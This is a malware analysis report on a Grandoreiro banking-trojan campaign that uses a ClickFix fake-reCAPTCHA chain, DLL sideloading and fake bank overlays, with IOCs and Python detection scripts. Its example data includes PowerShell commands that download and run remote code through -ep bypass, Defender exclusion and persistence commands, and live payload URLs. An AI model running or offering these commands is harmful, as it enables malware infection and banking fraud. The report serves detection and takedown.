
Grandoreiro's ClickFix Era: A Fake reCAPTCHA, a GoToMeeting DLL Sideload, and PIX QR Interception Against Eight Brazilian Banks

Published April 8, 2026

TL;DR

On April 8, 2026, a 951-byte batch file (p.bat) surfaced on MalwareBazaar (reported by johnk3r). Following the download URLs leads to a Grandoreiro-family Brazilian banking trojan delivered through a ClickFix/ClearFake fake-reCAPTCHA chain hosted at canalmodup.com. The payload is a 43.7 MB Delphi DLL that sideloads under legitimate, signed GoToMeeting (LogMeIn) and Nero WiFi+Transfer (Nero AG) binaries, targets eight major Brazilian banks, and ships with PIX QR-code interception.

The C2 at 177.136.230.88 (EVEO S.A., AS53107, Brazil) is live and actively serving payloads as of publication. The canalmodup.com domain was registered on 2025-12-19 through an Italian registrar with a Portuguese registrant and had been pre-staged for nearly four months before this wave went active.

What this report adds to the public record:

  • Documents the live ClickFix chain at canalmodup.com (fake reCAPTCHA → ClickFix instructions → fake Warsaw module update page) pushing the Grandoreiro variant
  • Details both DLL sideloading pairs used by this campaign: g2mstart.exe + g2m.dll (GoToMeeting / LogMeIn) and Flexpcis.exe + Drivespan.dll (Nero WiFi+Transfer)
  • Captures the full banking overlay target set — Banco do Brasil, Bradesco, Caixa Econômica Federal, Itaú Unibanco, Santander, Sicoob, Sicredi, and Unicred — impersonating GAS Tecnologia, Topaz OFD, and Trusteer IBM security modules
  • Provides the live payload URLs and IOCs so defenders and CERT.br can coordinate a takedown while the C2 is still serving

Hat tip to johnk3r for the sample on MalwareBazaar. If you've already published reporting on canalmodup.com, the EVEO C2, or this particular Grandoreiro variant, please reach out — we'll update and credit.


The Sample

Field                         Value
Filename                      p.bat (alt: 708347eab01ecdb9.bat)
SHA256                        9ffdbc990c92e9564bbf8dd727c2540f60aa18868c463e81e361069ad5e53938
MD5                           c87db14b102d98e6e225cfab157c8868
File type                     DOS batch file, 951 bytes
VT detection                  9/75 (Microsoft: Trojan:Script/Wacatac.B!ml)
First seen on MalwareBazaar   2026-04-08 01:32 UTC
Reporter                      johnk3r

Stage 0 — The ClickFix Chain at canalmodup.com

The campaign wraps this sample in a three-page social engineering chain:

Page 1 — canalmodup.com/ A fake Google reCAPTCHA ("Não sou um robô") calls navigator.clipboard.writeText() on click, silently copying a PowerShell command into the victim's clipboard. After 2.5 seconds the page redirects.

Page 2 — /b1dcae2d1df7766a915a43b9fd9f00f8d791e04c.php Titled "Confirmação necessária", this is the ClickFix instruction page:

  1. Press Win+R
  2. Type cmd and press Shift+Ctrl+Enter
  3. Press Ctrl+V
  4. Press Enter

The victim pastes the malicious PowerShell command from their clipboard into the command prompt that Ctrl+Shift+Enter launched elevated (after a UAC consent prompt they click through) and runs it themselves. Nothing is downloaded as a file by the browser, so mark-of-the-web never attaches to anything, and the command sets -ep bypass itself, so PowerShell execution policy does not apply either.

Page 3 — /a648da8021b90563fe11358516f936ebccf8100c.php Titled "Módulo Warsaw" and impersonating Caixa Econômica Federal's security module, this page tells the victim "Erro ao atualizar o Modulo" ("Error updating the module") and instructs them to visit internetbanking.caixa.gov.br or gerenciador.caixa.gov.br to "update the module". This is the point where the overlay-ready trojan is already installed and the victim is being steered into a real banking session for capture. The HTML contains commented-out code for a planned browser extension installation flow — the actor's roadmap leaking in page source.
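The following is an added example, not code from the report or from the actor's pages: a small triage script that pulls the clipboard-injected command out of a ClickFix landing page and scores an instruction page for the Win+R / Ctrl+V keystroke pattern described above (and used as a hunting lead in the Detections section). The two HTML strings are constructed to imitate pages 1 and 2; the address 198.51.100.7 is a documentation address and /next.php and p.txt are placeholders, not the campaign's real paths.

```python
import json
import re

# Constructed HTML imitating page 1 (fake reCAPTCHA that writes to the clipboard)
# and page 2 (ClickFix instructions). Illustrative input only, not the actor's source.
LANDING_PAGE = r'''
<div class="rc-anchor" onclick="verify()"><span class="rc-checkbox"></span> Não sou um robô</div>
<script>
  var cmd = "powershell -nop -noni -w h -ep bypass -c \"(New-Object Net.WebClient).DownloadString('http://198.51.100.7/modulo/p.txt') | IEX\"";
  function verify() {
    navigator.clipboard.writeText(cmd);
    setTimeout(function () { location.href = "/next.php"; }, 2500);
  }
</script>
'''

INSTRUCTION_PAGE = r'''
<h1>Confirmação necessária</h1>
<ol>
  <li>Pressione <kbd>Win</kbd>+<kbd>R</kbd></li>
  <li>Digite <b>cmd</b> e pressione <kbd>Shift</kbd>+<kbd>Ctrl</kbd>+<kbd>Enter</kbd></li>
  <li>Pressione <kbd>Ctrl</kbd>+<kbd>V</kbd></li>
  <li>Pressione <kbd>Enter</kbd></li>
</ol>
'''

# A JS string literal: opening quote, body with backslash escapes, matching closing quote.
_JS_STRING = r"""(?P<q>['"`])(?P<body>(?:\\.|(?!(?P=q)).)*?)(?P=q)"""
# writeText( <string literal> )  or  writeText( <identifier> )
_WRITETEXT = re.compile(r"navigator\.clipboard\.writeText\(\s*(?:" + _JS_STRING + r"|(?P<ident>\w+))", re.S)
# var/let/const NAME = <string literal>, so an identifier argument can be resolved.
_ASSIGN = re.compile(r"\b(?:var|let|const)\s+(?P<name>\w+)\s*=\s*" + _JS_STRING, re.S)
_ESCAPES = {"n": "\n", "t": "\t", "r": "\r"}


def _unescape_js(s: str) -> str:
    """Undo the common JS escapes (\\\" \\' \\\\ \\n \\t) so the payload reads as typed."""
    return re.sub(r"\\(.)", lambda m: _ESCAPES.get(m.group(1), m.group(1)), s, flags=re.S)


def extract_clipboard_payloads(page: str) -> list:
    """Return every string the page writes to the clipboard via navigator.clipboard.writeText."""
    assigned = {m.group("name"): _unescape_js(m.group("body")) for m in _ASSIGN.finditer(page)}
    payloads = []
    for m in _WRITETEXT.finditer(page):
        if m.group("body") is not None:
            payloads.append(_unescape_js(m.group("body")))
        elif m.group("ident") in assigned:
            payloads.append(assigned[m.group("ident")])
    return payloads


def triage_command(cmd: str) -> dict:
    """Flag the PowerShell traits the report calls out: hidden window, -ep bypass, a downloader, URLs."""
    low = cmd.lower()
    return {
        "powershell": "powershell" in low or "pwsh" in low,
        "hidden_window": bool(re.search(r"-w(?:indowstyle)?\s+h(?:idden)?\b", low)),
        "ep_bypass": bool(re.search(r"-e(?:xecutionpolicy|p)\s+bypass", low)),
        "download": any(k in low for k in ("downloadstring", "downloadfile", "invoke-webrequest", "iwr ")),
        "urls": re.findall(r"https?://[^\s'\")]+", cmd),
    }


# Keystroke sequence markers (matched after tags and whitespace are stripped).
CLICKFIX_MARKERS = (r"win\+r", r"ctrl\+v", r"(?:ctrl|shift)\+(?:ctrl|shift)\+enter")


def clickfix_score(page: str) -> int:
    """Count how many ClickFix keystroke markers a page carries (3 = full Win+R/elevated cmd/paste chain)."""
    text = re.sub(r"<[^>]+>", "", page).lower()
    text = re.sub(r"\s+", "", text)
    return sum(bool(re.search(p, text)) for p in CLICKFIX_MARKERS)


if __name__ == "__main__":
    found = extract_clipboard_payloads(LANDING_PAGE)
    report = {"payloads": found, "triage": [triage_command(c) for c in found],
              "instruction_page_score": clickfix_score(INSTRUCTION_PAGE)}
    print(json.dumps(report, indent=2, ensure_ascii=False))
```

The identifier resolution matters in practice: most ClickFix pages keep the command in a variable rather than inline, so a plain grep for writeText("powershell ...") misses them.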

Stage 1 — The BAT Dropper

The 951-byte p.bat does a lot in a tiny footprint:

  1. Elevation check: runs cacls.exe against %SYSTEMROOT%\system32\config\system to test for admin rights; if that fails it drops getadmin.vbs, which re-launches the script through Shell.Application.ShellExecute(..., "runas"). That is an ordinary UAC consent prompt, not a bypass; the victim has to click through it (or has already opened an elevated cmd as the ClickFix page told them to).
  2. PowerShell exec: launches with -nop -noni -w h -ep bypass.
  3. Payload download: Net.WebClient.DownloadFile pulls two files into C:\ProgramData\MSDefender\:
    • http://177.136.230.88/modulo/g2mstart.exe
    • http://177.136.230.88/modulo/g2m.dll
  4. Defender exclusions: Add-MpPreference excludes the MSDefender directory, the g2mstart.exe process, and the extensions exe, msi and dll.
  5. Registry persistence: writes HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\g2mstart.
  6. Execution: Start-Process launches g2mstart.exe.

Stage 2 — DLL Sideloading via GoToMeeting and Nero

Chain A: GoToMeeting

g2mstart.exe is a legitimate GoToMeeting v10.18.0 Build 19932 binary from LogMeIn, Inc., Authenticode-signed by LogMeIn through DigiCert. The signing cert expired in November 2021, which does not change the file's standing: it is still the vendor's own signed binary with a clean reputation, and that is all a sideload host needs. Its PDB path identifies the clean original:

c:\jenkins\workspace\Communication_Cloud\G2MWTEndpoint\Production\build-g2mwt-endpoint\output\G2M_Exe.pdb

VT: 0/76 detections — the binary itself is clean and being abused.

g2m.dll (45,796,352 bytes — 43.7 MB) is the malicious sidecar. It's a Delphi-compiled DLL (Embarcadero RAD Studio, ProgramID com.embarcadero.G2M, compile timestamp 2026-03-29) that exports the g2mcomm_winmain entry point g2mstart.exe imports. Its .rsrc section is 42.4 MB — 92.7% of the file is embedded banking overlay imagery. Imports include Magnification.dll (Windows Magnification API for screen capture), wsock32, and libcurl (curl_easy_* — an embedded HTTP client).

Chain B: Nero WiFi+Transfer

Flexpcis.exe is a legitimate Nero WiFi+Transfer v1.0.3.78, signed by Nero AG via Symantec/VeriSign. VT: 0/75 detections. Community reporting has seen this same signed binary distributed under at least 24 different filenames in sideloading campaigns: BackItUp.exe, mssedge.exe, Nabisko.exe, RedeWiFi.exe, V2motortubo.exe, and others.

Drivespan.dll (42,052,096 bytes — 40.1 MB) is the malicious companion. A prior version (041cbfa91ad48fa34f3437e440399838e82451b8d183c3cc52d7d8cb5037c494) hit 46/76 on VT.

Stage 3 — Delphi Banking Trojan Internals

The Delphi class names inside the DLL read like a Brazilian banker inventory:

Class                       Capability
TFrmPrincipal               Main controller form
TClientePrincipal           Primary C2 client
TClienteCmd                 Remote command execution
TClienteViewer              Remote screen viewer
TTNT_01 to TTNT_07          Bank overlay attack forms (stay-on-top, borderless, timed)
TClipboard                  Clipboard manipulation (PIX key / QR interception)
Magnification.dll imports   Screen capture via Windows Magnification API
TIdHTTP, TCPClient          Indy HTTP + raw socket C2

The resource section contains 38 bitmap overlays (L01–L38) and 29 PNG overlay screens across the target bank set:

Resource prefix   Target bank               Overlays    Purpose
TNTB              Banco do Brasil           4 + QR      BB Code validation, Topaz OFD impersonation
TNTC              Caixa Econômica Federal   1           Electronic signature capture
TNTCOOB           Sicoob                    1           Confirmation code interception
TNTD              Bradesco                  5 + PISCA   Security key validation, GAS Tecnologia impersonation
TNTI              Itaú Unibanco             4           "Guardião 30 Horas" install, card password theft
TNTS              Santander                 4 + QR      Electronic signature, QR validation, Trusteer impersonation
TNTSIC            Sicredi                   2           Electronic password + device serial capture
PNGIMAGE_1        Unicred                   1           Security plugin update
PNGIMAGE_5        Banco do Brasil           1           Diagnostic / install screen
RC02-RC38         Various                   26          Additional overlay variants

All overlays are branded with legitimate Brazilian banking security product logos (GAS Tecnologia, Topaz OFD Anti-Fraud Intelligence, Trusteer IBM) and capture card passwords, electronic signatures, QR/BB-code validation codes, device serial numbers, and PIX confirmation codes.

The C2 — 177.136.230.88 on EVEO S.A.

Field         Value
IP            177.136.230.88
ASN           AS53107 (EVEO S.A.)
Network       177.136.224.0/19
Country       Brazil
Open ports    22 (OpenSSH 9.6p1 Ubuntu), 80, 443 (Apache)
DNS           dns-a.eveo.com.br, dns-b.eveo.com.br, dns-c.eveo.com.br

The HTTP root returns 403 Forbidden. The payload path /modulo/ also returns 403, but each file inside it is directly downloadable; that is Apache's normal behaviour when directory listing is disabled and no index file exists, not access control on the payloads themselves. .git/ and .env are also present as 403-restricted endpoints. As of publication the payloads are still live.

canalmodup.com

Field                         Value
Registrar                     Register SPA (Italy)
Created                       2025-12-19
Expires                       2026-12-19
Registrant country            Portugal
Registrant region             Aboboda (suburb of Lisbon)
Nameservers                   Cloudflare (laylah.ns.cloudflare.com, rohin.ns.cloudflare.com)
TLS                           Let's Encrypt R12 leaf issued 2026-03-26; wildcard issued 2026-02-17
Cloudflare Analytics beacon   51dbae0a01854a769d9b1267c91acdd8

The Cloudflare Analytics beacon 51dbae0a01854a769d9b1267c91acdd8 is reused across all pages in the ClickFix chain and makes a clean pivot point for hunting related infrastructure.

Multi-Vector Distribution

The BAT file is just one leg of a larger campaign. Nine related samples were observed speaking to the same C2, spanning at least five distinct delivery mechanisms:

  1. BAT dropper (p.bat, this sample)
  2. ClickFix / ClearFake fake-CAPTCHA clipboard injection (pushes Flexpcis.exe + Drivespan.dll)
  3. VBS droppers disguised as DANFE (Brazilian electronic invoice)
  4. MSI installers: screanb.msi, screen rec.msi, Aplication.msi
  5. Direct executables: karm.exe, Aplicativo.exe

Campaign Timeline

Date          Event
2025-12-19    canalmodup.com registered
2026-02-17    Wildcard TLS cert issued
2026-03-26    Production TLS cert issued
2026-03-29    g2m.dll compiled (PE timestamp)
2026-03-29    FlexpcisInstaller.exe first seen on VT
2026-03-30    Drivespan.dll modified
2026-04-01    g2mstart.exe + g2m.dll last modified on C2
2026-04-06    MSI droppers first seen on VT
2026-04-07    modulo.zip updated on C2
2026-04-08    p.bat submitted to MalwareBazaar

Family Attribution — Grandoreiro, High Confidence

Every characteristic in the profile maps cleanly onto the Grandoreiro family:

  • Delphi (Embarcadero RAD Studio) compilation — hallmark of Brazilian LATAM bankers
  • DLL sideloading via legitimate signed binaries — standard Grandoreiro TTP, and use of GoToMeeting specifically has been documented in Grandoreiro campaigns since 2023
  • Overlay attack forms with TTNT_* naming — consistent with prior Grandoreiro analysis
  • Portuguese-named Delphi classes (TClientePrincipal, TClienteCmd, TClienteViewer)
  • GAS Tecnologia / Topaz OFD / Trusteer impersonation — common in Grandoreiro variants
  • PIX QR interception — modernization Grandoreiro operators added in 2024+
  • Brazilian bank exclusivity with high-fidelity overlays
  • ClickFix delivery — evolution from the family's traditional email and SEO poisoning

Detections & Hunting

  • Block 177.136.230.88 and canalmodup.com at the perimeter.
  • Alert on any process writing into C:\ProgramData\MSDefender\.
  • Alert on Add-MpPreference -ExclusionPath "C:\ProgramData\MSDefender" or similar Defender exclusion strings referencing MSDefender paths.
  • Hunt for g2mstart.exe loading g2m.dll from any path other than its legitimate LogMeIn install directory.
  • Hunt for Flexpcis.exe running from any path other than its Nero WiFi+Transfer install directory, and for the same signed binary running under a different filename; pivot on the 24+ known aliases (BackItUp.exe, mssedge.exe, RedeWiFi.exe, V2motortubo.exe, …).
  • Pivot on Cloudflare Analytics beacon 51dbae0a01854a769d9b1267c91acdd8 to discover sibling ClickFix pages.
  • Clipboard hunting: look for navigator.clipboard.writeText usage in unfamiliar landing pages followed by a user running PowerShell from Win+R / cmd.exe.
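As an added example (not code from the report or from any vendor), here are the hunting rules above, together with the Stage 1 dropper behaviours and the Stage 2 sideload pairs, expressed as Python run over constructed Sysmon-style events. The event records are made up to mirror the dropper's actions; the EXPECTED_DIRS path fragments stand in for the legitimate install directories and should be tuned per environment, and 198.51.100.7 is a documentation address, not the real C2.

```python
import re
from pathlib import PureWindowsPath

# Indicators taken from the report.
STAGING_DIR = r"c:\programdata\msdefender"
RUN_KEY = r"hklm\software\microsoft\windows\currentversion\run"
RUN_VALUES = {"g2mstart", "flexpcis"}
SIDELOAD_PAIRS = {"g2mstart.exe": "g2m.dll", "flexpcis.exe": "drivespan.dll"}  # host -> malicious sidecar
KNOWN_ALIASES = {"backitup.exe", "mssedge.exe", "nabisko.exe", "redewifi.exe", "v2motortubo.exe"}
# Assumed path fragments of the legitimate installs (placeholders to tune per environment).
EXPECTED_DIRS = {"g2mstart.exe": ("\\gotomeeting\\",), "flexpcis.exe": ("\\nero\\",)}

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"

# Constructed Sysmon-style events (process create, file create, registry set, image load)
# modelled on the dropper chain. 198.51.100.7 is a documentation address.
EVENTS = [
    {"type": "process", "image": CMD, "parent": r"C:\Windows\explorer.exe", "cmdline": "cmd"},
    {"type": "process", "image": PS, "parent": CMD,
     "cmdline": "powershell -nop -noni -w h -ep bypass -c \"(New-Object Net.WebClient)"
                ".DownloadFile('http://198.51.100.7/modulo/g2m.dll','C:\\ProgramData\\MSDefender\\g2m.dll')\""},
    {"type": "file", "image": PS, "target": r"C:\ProgramData\MSDefender\g2m.dll"},
    {"type": "process", "image": PS, "parent": CMD,
     "cmdline": "powershell -ep bypass -c \"Add-MpPreference -ExclusionPath 'C:\\ProgramData\\MSDefender' "
                "-ExclusionProcess 'g2mstart.exe' -ExclusionExtension exe,msi,dll\""},
    {"type": "registry", "image": PS, "key": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
     "value": "g2mstart", "data": r"C:\ProgramData\MSDefender\g2mstart.exe"},
    {"type": "process", "image": r"C:\ProgramData\MSDefender\g2mstart.exe", "parent": PS, "cmdline": "g2mstart.exe"},
    {"type": "imageload", "image": r"C:\ProgramData\MSDefender\g2mstart.exe",
     "loaded": r"C:\ProgramData\MSDefender\g2m.dll"},
    # Benign: the real client loading its own DLL from its install directory (must not fire).
    {"type": "imageload", "image": r"C:\Users\ana\AppData\Local\GoToMeeting\19932\g2mstart.exe",
     "loaded": r"C:\Users\ana\AppData\Local\GoToMeeting\19932\g2m.dll"},
    # Nero chain: the signed host renamed to one of its reported aliases (Sysmon's OriginalFileName gives it away).
    {"type": "process", "image": r"C:\Users\ana\AppData\Roaming\RedeWiFi.exe",
     "parent": r"C:\Windows\System32\msiexec.exe", "cmdline": "RedeWiFi.exe", "original_file_name": "Flexpcis.exe"},
]


def _base(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def _in_expected_dir(base: str, path: str) -> bool:
    return any(frag in path.lower() for frag in EXPECTED_DIRS.get(base, ()))


def _hit(rule: str, sev: str, event: dict, detail: str) -> dict:
    return {"rule": rule, "severity": sev, "image": event.get("image", ""), "detail": detail}


def hunt(events: list) -> list:
    """Apply the report's detections to a list of events and return the hits."""
    hits = []
    for e in events:
        kind, image = e["type"], e.get("image", "")
        base = _base(image)
        if kind == "process":
            cl = e.get("cmdline", "")
            low = cl.lower()
            # Defender exclusions; high severity when they point at the known staging directory.
            if "add-mppreference" in low and re.search(r"-exclusion(?:path|process|extension)", low):
                hits.append(_hit("defender_exclusion", "high" if STAGING_DIR in low else "medium", e, cl))
            # PowerShell launched with execution policy bypass and a download primitive.
            if re.search(r"-e(?:xecutionpolicy|p)\s+bypass", low) and \
               re.search(r"download(?:file|string)|invoke-webrequest|\biwr\b", low):
                hits.append(_hit("powershell_download_ep_bypass", "high", e, cl))
            # A sideload host renamed (OriginalFileName disagrees with the on-disk name) or using a known alias.
            ofn = e.get("original_file_name", "").lower()
            if ofn in SIDELOAD_PAIRS and base != ofn:
                hits.append(_hit("renamed_sideload_host", "high", e, f"{base} has OriginalFileName {ofn}"))
            elif base in KNOWN_ALIASES:
                hits.append(_hit("known_alias_filename", "medium", e, base))
            # A sideload host started from anywhere but its install directory.
            if base in SIDELOAD_PAIRS and not _in_expected_dir(base, image):
                hits.append(_hit("sideload_host_unexpected_path", "high", e, image))
        elif kind == "file":
            if str(PureWindowsPath(e["target"]).parent).lower().startswith(STAGING_DIR):
                hits.append(_hit("write_to_staging_dir", "high", e, e["target"]))
        elif kind == "registry":
            if e["key"].lower().startswith(RUN_KEY) and \
               (e["value"].lower() in RUN_VALUES or STAGING_DIR in e.get("data", "").lower()):
                hits.append(_hit("run_key_persistence", "high", e, f'{e["value"]} -> {e.get("data", "")}'))
        elif kind == "imageload":
            # The known host/sidecar pair loading outside the legitimate install directory.
            if SIDELOAD_PAIRS.get(base) == _base(e["loaded"]) and not _in_expected_dir(base, image):
                hits.append(_hit("dll_sideload", "critical", e, e["loaded"]))
    return hits


def rule_counts(hits: list) -> dict:
    counts = {}
    for h in hits:
        counts[h["rule"]] = counts.get(h["rule"], 0) + 1
    return counts


if __name__ == "__main__":
    for h in hunt(EVENTS):
        print(f'[{h["severity"]:8}] {h["rule"]:30} {h["image"]}  {h["detail"]}')
```

The renamed-host rule is the one that generalises beyond this campaign: comparing the PE OriginalFileName against the on-disk name catches the Nero binary under any of its aliases without maintaining the alias list, and the list is kept only as a cheaper second signal.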

IOCs

Network

177.136.230.88                                 C2 (EVEO S.A., AS53107, Brazil)
canalmodup.com                                  ClickFix landing domain
http://177.136.230.88/modulo/g2mstart.exe       Legitimate GoToMeeting binary (sideload host)
http://177.136.230.88/modulo/g2m.dll            Malicious Delphi DLL
http://177.136.230.88/modulo/Flexpcis.exe       Legitimate Nero binary (sideload host)
http://177.136.230.88/modulo/Drivespan.dll      Malicious DLL (Nero chain)
http://177.136.230.88/modulo/modulo.zip         Module bundle
51dbae0a01854a769d9b1267c91acdd8                Cloudflare Analytics beacon (pivot)

File Hashes (SHA256)

9ffdbc990c92e9564bbf8dd727c2540f60aa18868c463e81e361069ad5e53938  p.bat
f5d6037d2149e755813b9dbfc141f67054342f490534b730ed1494232ba3ac7d  g2m.dll (malicious)
917c44b884fd59b5bcf2a8e9a5fd39dbceb544f60eb8fa9316729e9572a7865d  Drivespan.dll (malicious)
07762231da2a8ce1dd2a211c49a27a2f06d7d2b7d5426fc5b6b114f845f1eca6  g2mstart.exe (legitimate, abused)
7e4132835419e4c415d048b64a5fc2813b8d2ff72bb5586d857dcdf6a90a45f2  Flexpcis.exe (legitimate, abused)

Host

C:\ProgramData\MSDefender\
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\g2mstart
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Flexpcis

Disclosure

The C2 at 177.136.230.88 is serving live banking trojan payloads against eight Brazilian financial institutions as of this report. Relevant notification targets:

  • CERT.br: cert@cert.br
  • EVEO S.A. abuse — via published WHOIS contacts
  • Banco Central do Brasil — financial sector regulator

GHOST — Breakglass Intelligence "One indicator. Total infrastructure."
